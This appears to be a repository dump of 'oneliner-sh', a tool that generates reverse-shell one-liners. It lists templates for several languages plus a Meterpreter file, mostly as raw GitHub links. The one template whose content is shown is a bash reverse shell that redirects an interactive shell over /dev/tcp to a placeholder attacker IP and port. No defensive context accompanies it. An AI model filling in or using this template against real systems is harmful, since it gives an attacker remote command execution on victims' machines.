├── LICENSE ├── README.md ├── files └── meterpreter.win ├── install_no_root.sh ├── oneliner.sh └── templates ├── perl.lin.win ├── php.lin.win ├── powershell.1.win ├── powershell.2.win ├── python.lin.win ├── ruby.lin.win ├── shell_script.1.lin ├── shell_script.2.lin └── shell_script.3.lin /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/README.md -------------------------------------------------------------------------------- /files/meterpreter.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/files/meterpreter.win -------------------------------------------------------------------------------- /install_no_root.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/install_no_root.sh -------------------------------------------------------------------------------- /oneliner.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/oneliner.sh -------------------------------------------------------------------------------- /templates/perl.lin.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/perl.lin.win -------------------------------------------------------------------------------- /templates/php.lin.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/php.lin.win -------------------------------------------------------------------------------- /templates/powershell.1.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/powershell.1.win -------------------------------------------------------------------------------- /templates/powershell.2.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/powershell.2.win -------------------------------------------------------------------------------- /templates/python.lin.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/python.lin.win -------------------------------------------------------------------------------- /templates/ruby.lin.win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/ruby.lin.win -------------------------------------------------------------------------------- /templates/shell_script.1.lin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/shell_script.1.lin -------------------------------------------------------------------------------- /templates/shell_script.2.lin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/operatorequals/oneliner-sh/HEAD/templates/shell_script.2.lin -------------------------------------------------------------------------------- /templates/shell_script.3.lin: -------------------------------------------------------------------------------- 1 | -SHELL- -i >& /dev/tcp/-IP-/-PORT- 0>&1 2 | --------------------------------------------------------------------------------